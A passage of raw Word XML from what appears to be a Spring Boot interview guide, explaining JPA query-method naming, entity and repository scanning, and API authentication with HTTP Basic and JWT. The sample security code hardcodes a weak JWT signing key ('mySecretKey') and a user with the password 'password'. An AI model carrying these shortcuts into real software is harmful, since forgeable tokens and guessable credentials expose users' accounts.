      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA0064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Internal Implementation of CamelCase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D95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define a method like findByEmployeeName, Spring Data JPA follows this convention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46011D8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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Indicates that it's a query method (not an update/delete operation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D74D37"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Name"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The field employeeName will be mapped to a corresponding database column, which should be employee_name in snake_case, depending on your entity's column name mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA0A2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andled internally in the Spring Data JPA </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>QueryMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class, which is responsible for interpreting the method names and generating the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQ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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D244579"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ustom Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389FB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default query generation doesn't meet your requirements or if you need a more complex query, you can also use the @Query annotation to write custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F81BDA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sing @Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F55A84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 WHERE e.name = :name")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44267CB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findByName(@Param("name") String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C7F1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FF41E5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Id</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works based on the entity's ID field and primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D0E6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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works by mapping the method name (findByName) to a query that looks for a column called name in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D75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s interpreted by Spring Data JPA to map the method names to corresponding database column names (e.g., findByEmployeeName is mapped to the column employee_name in snake_case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34626CC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uses reflection and its query creation mechanism to build the query dynamically at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F2C49" w14:textId="0CA45B5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740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="149114B2" w14:textId="47D02183" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="676" w:name="_Toc197867890"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does the JPA Repository know there is a class</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>
    </w:p>
    <w:p w14:paraId="44431F1C" w14:textId="0C0EACD8"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the JPA Repository knows about a class (entity) through the following process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D4C6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 Class Annotation (@Entity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F385C4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ke a class known to Spring Data JPA, it must be annotated with the @Entity annotation. This tells Spring that the class should be treated as a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA entity</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning it represents a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039530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234278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5DE935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6C608E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651540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691141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60C69C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41FF6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F0210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7A2F16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2F9B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AB2F7B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D5E2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 @Entity annotation marks the class as an entity, and the corresponding table name is usually derived from the class name (in this case, employee), unless specified otherwise using the @Table annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E576E01"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PA Repository Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23E1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the entity, you create a repository interface that extends JpaRepository or one of its superinterfaces, such as CrudRepository or PagingAndSortingRepository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F9E4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2B715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44CF32A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y methods can be defined here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7094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38D07F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is a Spring Data interface that provides basic CRUD operations, along with methods like findById, save, deleteById, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3477A0F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ic Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67F953"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first parameter of JpaRepository is the entity type (Employee in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4E92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cond parameter is the type of the entity's primary key (Long in this case, as the Employee class has a Long type id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62023F4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mponent Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42A89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scans the project’s packages for classes annotated with @Entity and interfaces that extend JpaRepository during application startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17497C6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Applic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s (or their combination) are responsible for enabling the automatic configuration of Spring Data JPA, and they instruct Spring to scan for repository interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79351D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 is usually used to enable JPA repositories if you want to customize the location or behavior of the repository scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AA716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basePackages = "com.example.repositories")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE0330"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ation in application.properties or application.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D492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configures JPA based on the properties defined in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCAC7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properties define the database connection details, dialect, and other JPA settings like hibernate.ddl-auto and spring.jpa.properties.hibernate.dialect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00024E9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38ECC0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your_database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48351C9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389635D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59CCF1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BC1E9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791FBBC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uto-Configuration in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173EA2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rocess Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB396F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classes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@Entity) are scanned by Spring Boot during the application startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B32CF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interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> extending JpaRepository are recognized by Spring Data JPA as the mechanism to perform CRUD operations on entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD0D23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s automatically implemented at runtime by Spring Data JPA, which allows you to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DD463"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s auto-configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sets up the necessary beans like EntityManagerFactory and DataSource based on the configuration in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869A13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invoke methods on the repository (employeeRepository.findById(id)), Spring Data JPA generates SQL queries and interacts with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075AD79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30D3A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xml:space="preserve"> annotation makes a class known to JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D98BC1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nterface provides the mechanism to interact with that entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17742C2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configures and scans for entities and repositories during startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE826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 repositories are auto-implemented, and Spring Data JPA handles query generation based on method names or custom queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFC694D" w14:textId="78485179"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741" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="436933A4" w14:textId="34AB852D" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009572AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="677" w:name="_Toc197867891"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How will you authenticate API in Spring Boot</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="677"/>
    </w:p>
    <w:p w14:paraId="3C6F462B" w14:textId="6B84B321" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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uthenticate APIs in a Spring Boot application, you can implement authentication using several methods. Here are the common ways to authenticate APIs in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E3B3D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asic Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21771F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Authentication involves sending a username and password with each request. It's simple but not very secure without HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F642B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0F6A8BB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dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your pom.xml or build.gradle file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E197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HTTP Basic authentication in your Spring Security configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A2952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6540231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8E750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C2D7C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38014E8B" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252F0A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8C31D8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1050D8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089913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37F7B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7CAD2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8C062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e basic authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278B438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4A9C060" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F45D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54E4B9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37B6C6E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inMemoryAuthentication()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F89C9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ithUser("user").password(passwordEncoder().encode("password")).roles("USER");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B9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FF0FD6" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0F77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F75003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069636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4BA5F0B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10669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3C54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the above configuration, any request to /api/** endpoints will require basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87203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redentials are provided as Authorization: Basic base64(username:password) in the request header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBD09E"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WT Authentication (JSON Web Token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF3A4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is a widely used token-based authentication mechanism. It allows you to authenticate once and then use the token for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C9462"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BB5497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and JWT dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D060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filter for JWT authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915DB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WT tokens for subsequent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E6C1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0D468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Utility Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (responsible for creating and parsing tokens):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB5C8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DCA02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TokenUtil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9799E" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BBA7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secretKey = "mySecretKey"; // You can store this in application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240637EF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9C9B2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generate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9CE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nerateToken(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597538A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builder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B6B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ubject(username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E292C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IssuedAt(new Date())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA994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etExpiration(new Date(System.currentTimeMillis() + 1000 * 60 * 60)) // Token validity: 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B24B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ignWith(SignatureAlgorithm.HS256, secretKey)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FE5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act();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF86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3E0C17" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64628A2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validate JWT token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335AABB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validateToken(String token, String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3879A7F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parsedUsername = extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DF34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parsedUsername.equals(username) &amp;&amp; !isTokenExpired(token));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA62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C0395CF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1097173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extractUsername(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61895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2BDEC6F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1C82DA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630351E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1169185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07D818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841FD78" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A59A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boolean isTokenExpired(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B18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tractExpiration(token).before(new Date());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C863BD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B259FB" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0932D8E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ate extractExpiration(String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB83D9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D2050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5BC7CA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1AB6DD0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74497C3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Expiration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FA97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9861A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AC839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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (responsible for intercepting requests to check for a valid token):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40525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67A335A2" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4D6E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64A37E36" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2DBA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624F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DetailsService userDetailsService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E902C13" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF7C18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JwtRequestFilter(JwtTokenUtil jwtTokenUtil) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC9006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3C20986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9846BEF" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782D7D9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43845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7DC58D0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1EC02B2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4D440FF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47257BA7" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405985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65B270A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ken = token.substring(7); // Remove "Bearer " prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998030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TokenUtil.extractUsername(token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9911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FF0B60" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17641F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77123E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UserDetails userDetails = userDetailsService.loadUserByUsername(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7C600" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A3A17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TokenUtil.validateToken(token, username)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377696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authentication =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B67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Details, null, userDetails.getAuthorities());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14B2F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authentication);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23394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5A0A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662ED2A" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
